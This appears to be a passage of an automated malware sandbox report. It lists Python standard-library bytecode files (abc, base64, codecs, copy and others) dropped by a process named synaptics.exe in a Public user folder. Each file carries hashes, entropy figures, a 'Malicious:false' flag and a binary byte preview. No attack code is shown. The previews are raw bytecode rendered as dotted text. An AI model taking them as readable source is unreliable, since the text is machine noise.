                                                                                                                                                                                                                                  SHA-512:74878FC13AA4A06D309325B46BD4B98AE07E6D8B27D69CFB710773B147CC49BE9136A7C3455A77C304E69DAD0A1034CE0DE6692A3FC4A4C3B3161992F5D73335
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Z*e*..Z*e.e*..Z+e*.,....[*d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d*..d*e8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF.3e(....G.dAdB..dBe;..ZGG.dCdD..dDeGeC..ZHeH.3e$..
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4523
                                                                                                                                                                                                                                  Entropy (8bit):5.142477077602006
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:inAZIr5wc+SHmtPK4Q9XEf9j0K5ULIPmwPu7gKxNW4q4RqOJd0f:iNsByEeIOQCxNWQRqOT0f
                                                                                                                                                                                                                                  MD5:6D6822CD0E49905033E0CB505877C076
                                                                                                                                                                                                                                  SHA1:316DB01074EBE83FE18F607A9F36A1A2C2702964
                                                                                                                                                                                                                                  SHA-256:152E5F5A40EAFF9766106876D18B93A504B7690F4079ACE59106367609F652AD
                                                                                                                                                                                                                                  SHA-512:1983CB7AFEB80D519B4EC6EEF616308DAC521C5E85149D502EBB0A5D1CA0AEEC2A45A040A0F388C2F3415452EEFF8E8D71BDBB88B4D40CEB8409089FE4EE6F51
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...sB...d.Z.d.d.l.Z.d.d.l.Z.e.j.Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.d.S.).z7Internal classes used by the gzip, lzma and bz2 modules.....Nc....................@...s0...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...BaseStreamz.Mode-checking helper functions.c....................C...s....|.j.r.t.d.....d.S.).Nz.I/O operation on closed file)...closed..ValueError....self..r......C:\Users\Public\M20EKMMEH2\lib\_compression.py.._check_not_closed....s..........z.BaseStream._check_not_closedc....................C........|.....s.t...d.....d.S.).Nz.File not open for reading)...readable..io..UnsupportedOperationr....r....r....r......_check_can_read...............z.BaseStream._check_can_readc....................C...r....).Nz.File not open for writing)...writabler....r....r....r....r....r......_check_can_write....r....z.BaseStream._check_can_writec....................C...s(...|.....s.t...d.....|.....s.t...d.....d.S.).Nz3Seeking is only supported on files
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3558
                                                                                                                                                                                                                                  Entropy (8bit):5.077510108533416
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:PLsOn3xh9/uydg7ls3pl+ltJ5+XdaCjteUzCt/BHKGZEIy0EEt:PLs8xfcls3plwtJEXdaIeUzMJty0EG
                                                                                                                                                                                                                                  MD5:C9347D770AB8BF731C342C4A55B43B32
                                                                                                                                                                                                                                  SHA1:5B7A552DA518AF40E5F4F82EBB81A408CB73297E
                                                                                                                                                                                                                                  SHA-256:A53D5417477F63F195D06B0C07DB9564CAEA804842B80F012050CA5BFCB3CD4B
                                                                                                                                                                                                                                  SHA-512:FAED6E8D2D44E678D13795A7EEE18AD7961FCED8B657F5F40EA3DD1D5AEA3EE07622354557E540D192AE0CD34F9586DC4414163FD1514A11CEF7E3336B46CC3C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s@...d.Z.d.d.l.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).z=.The objects used by the site module to add custom builtins.......Nc....................@...s&...e.Z.d.Z.d.d...Z.d.d...Z.d.d.d...Z.d.S.)...Quitterc....................C...s....|.|._.|.|._.d.S...N....name..eof)...selfr....r......r...../C:\Users\Public\M20EKMMEH2\lib\_sitebuiltins.py..__init__....s........z.Quitter.__init__c....................C...s....d.|.j.|.j.f...S.).Nz.Use %s() or %s to exitr......r....r....r....r......__repr__....s......z.Quitter.__repr__Nc....................C...s&...z.t.j.......W.t.|...........Y.t.|.....r....)...sys..stdin..close..SystemExit).r......coder....r....r......__call__....s................z.Quitter.__call__r....)...__name__..__module__..__qualname__r....r....r....r....r....r....r....r........s............r....c....................@...s6...e.Z.d.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)..._Printerzninteractive prompt objects for printi
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7619
                                                                                                                                                                                                                                  Entropy (8bit):4.617874922906838
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:6oLAmOjav3ze0qLnKFHWpLiEEskjXoNizmM8+WsxL13vbRJv4ZO1VAUV0KcyyYTT:3LAbj236LTKF2pLiE3kjXoEzml+WsxL3
                                                                                                                                                                                                                                  MD5:89B404C8BC522D584108A40D1727E0B8
                                                                                                                                                                                                                                  SHA1:67B3D39D6158FB51C6730B63A5B87B5D73CF2EDD
                                                                                                                                                                                                                                  SHA-256:C38CFD14088A90D1D84295C9A2034A976BA5E54694C4EBEE357443D5F43448E2
                                                                                                                                                                                                                                  SHA-512:0FD549E0D9027D6FD96D45911A736BEF599561212E32170EBD5DD77BC811E1CDE44BC072C214B6150CFBE8D6D2677E25C9E35B6C1D8C9296774F10DCC731AEAC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s>...d.d.l.m.Z...d.d.l.m.Z...d.g.Z.G.d.d...d...Z.G.d.d...d...Z.d.S.)..........ref)...Generiuseras..WeakSetc....................@...s$...e.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.)..._IterationGuardc....................C...s....t.|...|._.d.S...N).r......weakcontainer)...selfr......r.....-C:\Users\Public\M20EKMMEH2\lib\_weakrefset.py..__init__....s......z._IterationGuard.__init__c....................C...s ...|.....}.|.d.u.r.|.j...|.....|.S.r....).r......_iterating..add).r......wr....r....r......__enter__....s............z._IterationGuard.__enter__c....................C...s8...|.....}.|.d.u.r.|.j.}.|...|.....|.s.|.......d.S.d.S.d.S.r....).r....r......remove.._commit_removals).r......e..t..br......sr....r....r......__exit__....s....................z._IterationGuard.__exit__N)...__name__..__module__..__qualname__r....r....r....r....r....r....r....r........s............r....c....................@...s&...e.Z.d.Z.d@d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6762
                                                                                                                                                                                                                                  Entropy (8bit):5.125610687184022
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:ic2+dPAM6MGWUls1p2N8R6Diag2z9o2Ue4loXLk5ebUtoH:j2+dPUMGxYtag2VXLk5ewc
                                                                                                                                                                                                                                  MD5:763E2FE5E88F2B81404CD4F3643A8209
                                                                                                                                                                                                                                  SHA1:90860241BAAB178D13BC3E210CEBC57B40E1E1C7
                                                                                                                                                                                                                                  SHA-256:F46D663E2B53C06AE3F58088C6A91242182F28912D53803B1066C77209A3A5B6
                                                                                                                                                                                                                                  SHA-512:3570512A41F09F308BF94FE39C877A3EAD1AB25BA6D36E430B26AE185DBA15C19E470927D7CB9DDF8E119AD6E160ED89AC65779A2FCBE23C9383A1DB381B86B8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d6........................@...s....d.Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...W.n...e.yH......d.d.l.m.Z.m.Z...d.e._.Y.n.w.G.d.d...d.e...Z.d.d...Z.G.d.d...d.e.d...Z.d.S.).z3Abstract Base Classes (ABCs) according to PEP 3119.c....................C...s....d.|._.|.S.).a<...A decorator indicating abstract methods... Requires that the metaclass is ABCMeta or derived from it. A. class that has a metaclass derived from ABCMeta cannot be. instantiated unless all of its abstract methods are overridden.. The abstract methods can be called using any of the normal. 'super' call mechanisms. abstractmethod() may be used to declare. abstract methods for properties and descriptors... Usage:.. class C(metaclass=ABCMeta):. @abstractmethod. def my_abstract_method(self, ...):. .... T)...__isabstractmethod__).Z.funcobj..r.....%C:\Users\Public\M20EKMMEH2\lib\abc.py..abst
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):17173
                                                                                                                                                                                                                                  Entropy (8bit):5.499366955795983
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:KZvQ18ayn9wBqXa71hITEetuAk8M77m2n9t/MRWFA3CTDTIzuQc4bimd3c6tV3:47ay9wgq71hITuDyq9PXT4uQuI3htV3
                                                                                                                                                                                                                                  MD5:DEBA26302AF9D6F4064960D897C8EE75
                                                                                                                                                                                                                                  SHA1:743D01CAAB7D17ACE31EC18D8C8A0B7170B6E495
                                                                                                                                                                                                                                  SHA-256:A051DC7EC3A79AE6C8F3A31EFCBB8A7CB328F49CA9F8F000CCB0EBF4C79DF02B
                                                                                                                                                                                                                                  SHA-512:3C26445CFB4406996F0F2BA1A1A84735344069F57E23214A439DCAF2F64ABA1C54343E22AD09401ABE8D1DEF79BE5AE6CEAA2930A8D48D8AB4E1B40771E8C2FF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.S.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.e.e.f.Z.d.d...Z.dQd.d...Z.dRd.d...Z.d.d...Z.d.d...Z.e...d.d...Z.e...d.d...Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.i.a.i.a.d.d...Z.dSd.d...Z.d.d...Z.e.j.d d!..e._.dSd"d#..Z.e.j.d e.d$..e._.d%d&..Z.e.j.d'd!..e._.dTd(d)..Z.e.j.d'd*d$..e._.d+d,..Z dTd-d...Z!d.a"d.a#d/Z$d0Z%dUd1d2..Z&d.d.d.d.d3..d4d5..Z'd.d.d6d7..d8d9..Z(d:Z)d.a*d.a+d.a,dTd;d<..Z-d=d>..Z.d?Z/e/d@..dA..Z0dBdC..Z1dDdE..Z2dFdG..Z3dHdI..Z4dJdK..Z5dLdM..Z6dNdO..Z7e8dPk.r.e6....d.S.d.S.)VzDBase16, Base32, Base64 (RFC 3548), Base85 and Ascii85 data encodings.....N)...encode..decode..encodebytes..decodebytes..b64encode..b64decode..b32encode..b32decode..b32hexencode..b32hexdecode..b16encode..b16decode..b85encode..b85decode..a85encode..a85decode..standard_b64encode..standard_b64decode..urlsafe_b64encode..urlsafe_b64decodec....................C...sl...t.|.t...r.z.|...d...W.S...t.y.......t.d.....w.t.|.t...r.|.S.z.t.|.......W.S...t.y5......t.d.|.j.j.....d...
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2599
                                                                                                                                                                                                                                  Entropy (8bit):5.221183447947155
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:TChwHaPJ7Bn7V3lvEOCl7VU3OpOBn7B3wCLnCRl7VC39eV:TCh7Bx3lEOC03OpOB93wGCRi34V
                                                                                                                                                                                                                                  MD5:89295929C44B04D07432A8CAFE010C97
                                                                                                                                                                                                                                  SHA1:3022462EB2B49D4E44605EFFDFAEA187A9EDAB06
                                                                                                                                                                                                                                  SHA-256:F5FBE6423676A0888FEE0EED036491C7C83B4B244CCF07116F4C728B9F38B32B
                                                                                                                                                                                                                                  SHA-512:37B83EB981074F774F7061E9E4BFF8A704873371EEBA5057CB2B9CD74B66439EB9DADBE40A8A08C74A2EA674845D2C72EEA2D83713D81542F2CC2F79FAA0116C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...sp...d.Z.d.d.d...d.d...Z.d.d.d...d.d...Z.d.d.d...d.d...Z.d.d.d...d.d...Z.z.d.d.l.T.W.n...e.y1......Y.n.w.e.Z.e.Z.d.S.).z.Bisection algorithms......N....keyc....................C....>...|.d.u.r.t.|.|.|.|...}.n.t.|.|.|...|.|.|.d...}.|...|.|.....d.S.).z.Insert item x in list a, and keep it sorted assuming a is sorted... If x is already in a, insert it to the right of the rightmost x... Optional args lo (default 0) and hi (default len(a)) bound the. slice of a to be searched.. Nr....)...bisect_right..insert....a..x..lo..hir......r.....(C:\Users\Public\M20EKMMEH2\lib\bisect.py..insort_right....s............r....c....................C...s....|.d.k.r.t.d.....|.d.u.r.t.|...}.|.d.u.r1|.|.k.r/|.|...d...}.|.|.|...k.r'|.}.n.|.d...}.|.|.k.s.|.S.|.|.k.rN|.|...d...}.|.|.|.|.....k.rF|.}.n.|.d...}.|.|.k.s5|.S.).a....Return the index where to insert item x in list a, assuming a is sorted... The return value i is such that all e in a[:i] have e <= x
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10881
                                                                                                                                                                                                                                  Entropy (8bit):5.274572210914015
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:66Eb2RLORaQHzW6FVoDCGEUPIzSh/NHSN:3RLORLpGPIzG/NyN
                                                                                                                                                                                                                                  MD5:347438C098A507697BEDAD93DA2CB575
                                                                                                                                                                                                                                  SHA1:7F8C64EF2C79A0112E4D82051D1AA73A2C79D73B
                                                                                                                                                                                                                                  SHA-256:2E349AB7AC287AD0127518B1F009BA6F35AF2885F204BFDDDE08D36DA370DFE7
                                                                                                                                                                                                                                  SHA-512:D4C1767694EEDAB3F9EA0FFCF49F9941B80CE08B8259A42D398405226C43F7C471ACFB65BA170BDDCB9AA330971BD5D00A617E7A2AB8E9DA084DFD91CF649329
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d./.......................@...s....d.Z.g.d...Z.d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.Z.d.Z.d.Z.G.d.d...d.e.j...Z.....d.d.d...Z.d.d.d...Z.d.d...Z.d.S.).z.Interface to the libbzip2 compression library...This module provides a file interface, classes for incremental.(de)compression, and functions for one-shot (de)compression..)...BZ2File..BZ2Compressor..BZ2Decompressor..open..compress..decompressz%Nadeem Vawda <nadeem.vawda@gmail.com>.....).r....N).r....r..............c....................@...s....e.Z.d.Z.d.Z.d*d.d...d.d...Z.d.d...Z.e.d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d+d.d...Z.d,d.d...Z.d,d.d...Z.d.d...Z.d,d.d...Z.d,d.d ..Z.d!d"..Z.d#d$..Z.e.j.f.d%d&..Z.d'd(..Z.d)S.)-r....a@...A file object providing transparent bzip2 (de)compression... A BZ2File can act as a wrapper for an existing file object, or refer. directly to a named file on disk... Note that BZ2File provides a *binary* file interface - data read is. returned as bytes, and data t
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):26314
                                                                                                                                                                                                                                  Entropy (8bit):5.231812180815295
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:qkfNsz3TQClly8bR9PS3q4Rh1mcMjscr3KLr:qwmHS3qF2i3KLr
                                                                                                                                                                                                                                  MD5:91EF10A8B7A81BBF17784470B22C88B5
                                                                                                                                                                                                                                  SHA1:EB36374EE85BA20998194049BF6C53126863AE31
                                                                                                                                                                                                                                  SHA-256:19C84BCD637AB47E5EEE76B3A3AE81D4751F9C300A3AA1830ED1EC58AE21DA87
                                                                                                                                                                                                                                  SHA-512:993A54F7924125AE4938E54D2534439F850326F6941F2F5F996C6E2FBC83E9C3528C8C2F2F22DDAF1A1B7F3C49EDAB5D7AF2CFB5C38D2936E95A97FF68833AB8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.b.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...g.d...Z.e.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.Z.d.Z.g.d...Z.G.d.d...d...Z.G.d.d...d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...\.Z.Z.Z.Z.Z.Z.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z d.d...Z!d.d ..Z"d!d"..Z#G.d#d$..d$e$..Z%G.d%d&..d&e%..Z&G.d'd(..d(e%..Z'G.d)d*..d*..Z(G.d+d,..d,e&..Z)G.d-d...d.e'..Z*e&..Z+e+j,Z-d/d0..Z.e+j/Z0e+j1Z1e+j2Z3e+j4Z5e+j6Z6e+j7Z8e+j9Z:e+j;Z<d1Z=d2Z>e=e>f.d3d4..Z?e=e>f.d5d6..Z@d7ZAe..BeAd.d....C..ZDd8d9..ZEd:d;..ZFeGd<k.r.eFe.jH....d.S.d.S.)=a$...Calendar printing functions..Note when comparing these calendars to the ones printed by cal(1): By.default, these calendars have Monday as the first day of the week, and.Sunday as the last (the European convention). Use setfirstweekday() to.set the first day of the week (0=Monday, 6=Sunday)......N)...repeat)...IllegalMonthError..IllegalWeekdayError..setfirstweekday..firstweekday..isleap..leapdays..weekday..monthrange..monthcalendar..prmonth..m
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):33230
                                                                                                                                                                                                                                  Entropy (8bit):5.022055991140742
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:58/o6wZxokNQceWYXgYD7msLySGRbmOZwENNflPKPBxKa:5OUkFrOZwENNflPKPBxKa
                                                                                                                                                                                                                                  MD5:E34B4EC4C0BF2FF16A996FB3FC9370E4
                                                                                                                                                                                                                                  SHA1:F76EAB91BF6A85234C8D4CCF7AB5F4C6BF84C58D
                                                                                                                                                                                                                                  SHA-256:D04C8D28A3269A0692923149C22FC17E70C7F3833FED9B1B73CF69E32527F276
                                                                                                                                                                                                                                  SHA-512:113FA6497E5CD3B9D397A113EB69135915D34F64AD6B64EBC2EA23CC59DD757C0A767D859C8E4DA69BA3282AC0D6AFAA50A13CA1EE4C03149D8D3409156A05E6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d........................@...sD...d.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.T.W.n...e.y"..Z...z.e.d.e.......d.Z.[.w.w.g.d...Z.d.Z.d...Z.Z.d...Z.Z.d.Z.d.Z.e.j.d.k.rAe...Z.Z.e.Z.n.e...Z.Z.e.Z.e.Z.e.Z.e.Z.e.Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z G.d.d...d...Z!G.d.d...d...Z"dCd#d$..Z#dDd%d&..Z$d'd(..Z%d)d*..Z&d+d,..Z'd-d...Z(d/d0..Z)d1d2..Z*dEd3d4..Z+dEd5d6..Z,d7d8..Z-d9d:..Z.z.e/d!..Z0e/d;..Z1e/d<..Z2e/d=..Z3e/d>..Z4e/d?..Z5W.n...e6y.......d.Z0d.Z1d.Z2d.Z3d.Z4d.Z5Y.n.w.d.Z7e7..r.d.d.l8Z8e9d@k...r e$e.j:dAdB..e._:e$e.j;dBdA..e._;d.S.d.S.)Fz. codecs -- Python Codec Registry, API and helpers....Written by Marc-Andre Lemburg (mal@lemburg.com)...(c) Copyright CNRI, All Rights Reserved. NO WARRANTY........N)...*z%Failed to load the builtin codecs: %s),..register..lookup..open..EncodedFile..BOM..BOM_BE..BOM_LE..BOM32_BE..BOM32_LE..BOM64_BE..BOM64_LE..BOM_UTF8..BOM_UTF16..BOM_UTF16_LE..BOM_UTF16_BE..BOM_UTF32..
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20906
                                                                                                                                                                                                                                  Entropy (8bit):5.0842204147752526
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:rrcHbNxImphzxb/Dqd89tiVqnWcxavd5VCqXfNnpJ:vcHbNxhzpqd2OqnWvQAFf
                                                                                                                                                                                                                                  MD5:C82F49DB0D5DC2CEF96515E0FA5E44EB
                                                                                                                                                                                                                                  SHA1:BEC72681A40EE1E69E582528317C7484D006A36D
                                                                                                                                                                                                                                  SHA-256:A967CCF06A6F822096CBB29E881858AE6DD8221599E4F2BC5B392ED5412DC7B5
                                                                                                                                                                                                                                  SHA-512:2E28804F2CDFE9A91F2A773CA83C2B3698C75840966392F5FD20268BC6630FF79ACC103D5F2523B7C9FCC9E3759D1AEB15CEFA0977DFFC9FDE5A28E19C30604A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.h.......................@...s~...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...g.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e.e.e...Z.G.d.d...d.e.e.e...Z.d.d...Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d ..d e...Z.G.d!d"..d"e...Z.G.d#d$..d$e...Z.G.d%d&..d&..Z.G.d'd(..d(e.e...Z.G.d)d*..d*e.e...Z.G.d+d,..d,e.e...Z d.S.)-z4Utilities for with-statement contexts. See PEP 343......N)...deque....wraps)...MethodType..Generiuseras)...asynccontextmanager..contextmanager..closing..nullcontext..AbstractContextManager..AbstractAsyncContextManager..AsyncExitStack..ContextDecorator..ExitStack..redirect_stdout..redirect_stderr..suppress..aclosingc....................@....:...e.Z.d.Z.d.Z.e.e...Z.d.d...Z.e.j.d.d.....Z.e.d.d.....Z.d.S.).r....z,An abstract base class for context managers.c....................C........|.S...z0Return `self` upon entering the runtime context.......selfr....r.....,C:
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7007
                                                                                                                                                                                                                                  Entropy (8bit):5.421860505439238
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:lxPakDZxS5GwVc3isTDOuyib91quyccWEQTidqf2hMQkNv4n5q:Pa0/S5GacR/Iib9wEREkidQ2Ov4k
                                                                                                                                                                                                                                  MD5:99A6D7E897A30D02C97435D94D21A32B
                                                                                                                                                                                                                                  SHA1:A8D3C2881C05D36E38D70D9F38C25D6379A685EC
                                                                                                                                                                                                                                  SHA-256:77D2893134DBB8048F0686E719535A5148E748B56DB58B4204C2CA0C2532BF7E
                                                                                                                                                                                                                                  SHA-512:FAC5BBED49E91A1B5439A6D37DA1A876AE8C38242F49278597BE220EA757B10D6F6CF9CADFD5407A1F230AE562A0012564526324523C5423449ED44F79E809DE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.#.......................@...sV...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...G.d.d...d.e...Z.e.Z.z.d.d.l.m.Z...W.n...e.y-......d.Z.Y.n.w.g.d...Z.d.d...Z.i...Z.Z.d.d...Z.e.d...e.e.e.e.e.e.e.e.e.e.e.e.e.j.e.e...e.e...e.j.e.j f.D.].Z!e.e.e!<.q[e"e.d.d...Z!e!d.u.rpe.e.e!<.e#j.e.e#<.e$j.e.e$<.e%j.e.e%<.e&j.e.e&<.e.d.u.r.e.j.e.e.<.[.[!d.g.f.d.d...Z'i...Z(Z.d.d...Z)e)e.e.d...<.e)e.e.e...<.e)e.e.e...<.e)e.e.<.e)e.e.<.e)e.e.<.e)e.e.<.e)e.e.<.e)e.e.<.e)e.e.j*<.e)e.e.<.e)e.e.<.e)e.e.j.<.e)e.e.j.<.e)e.e.j <.e)e.e.<.e'f.d.d...Z+e+e.e#<.e'f.d.d...Z,e,e.e.<.e'f.d.d...Z-e-e.e$<.e.d.u...r.e-e.e.<.d.d...Z.e.e.e.j/<.[.d.d...Z0..d.e'd...d.d...Z1[.[.[.d.S.).a....Generic (shallow and deep) copying operations...Interface summary:.. import copy.. x = copy.copy(y) # make a shallow copy of y. x = copy.deepcopy(y) # make a deep copy of y..For module specific errors, copy.Error is raised...The difference between shallow and deep copying is only relevant for.compound objects (object
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4694
                                                                                                                                                                                                                                  Entropy (8bit):5.3034929104246205
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:ZCI7QMLHGjZZc9X1XBrxbbJz0uqhUaCWfqmb5p2LYHjmTrhqH3TpYXGP2:HvHGOBrpb56eWfhqLYHjmTkH3TpY2P2
                                                                                                                                                                                                                                  MD5:103D050ACE177948729C65C56AF01CB5
                                                                                                                                                                                                                                  SHA1:4FB68E53FBF67E9514AF90A3937A5E5C2CDC74C5
                                                                                                                                                                                                                                  SHA-256:69668748421BD65A7974A69BE6138D54018D80582EBFFB5719490290B3B6A85B
                                                                                                                                                                                                                                  SHA-512:306BB8823ABB8BD934DEFBC7EAA88F5B573D7AAB7D533D81EBEBC3CB52D6B7514C9A7E92914E849F7247FCDD10B2160C564068D332909F997174A488D68981C3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.Z.g.d...Z.i.Z.d.d.d...Z.d.d...Z.z.e...W.n...e.y.......Y.n.w.d.d...Z.e.e.e.e.....d.d...Z.e.e.e.e.B...e.....d.d...Z.d.Z.e.e.j...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.i.Z.i.Z.i.Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z.Helper to provide extensibility for pickle...This is only useful to add pickle support for extension types defined in.C, not for instances of user-defined classes..)...pickle..constructor..add_extension..remove_extension..clear_extension_cacheNc....................C...s0...t.|...s.t.d.....|.t.|.<.|.d.u.r.t.|.....d.S.d.S.).Nz$reduction functions must be callable)...callable..TypeError..dispatch_tabler....).Z.ob_typeZ.pickle_functionZ.constructor_ob..r.....)C:\Users\Public\M20EKMMEH2\lib\copyreg.pyr........s................r....c....................C...s....t.|...s.t.d.....d.S.).Nz.constructors must be callable).r....r....)...objectr....r....r....r........s..........r....c....................C...s....t.|.j.|.j.f.f.S...N)...complex..real..im
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11809
                                                                                                                                                                                                                                  Entropy (8bit):5.447004589437788
                                                                                                                                                                                                                                  Encrypted:false
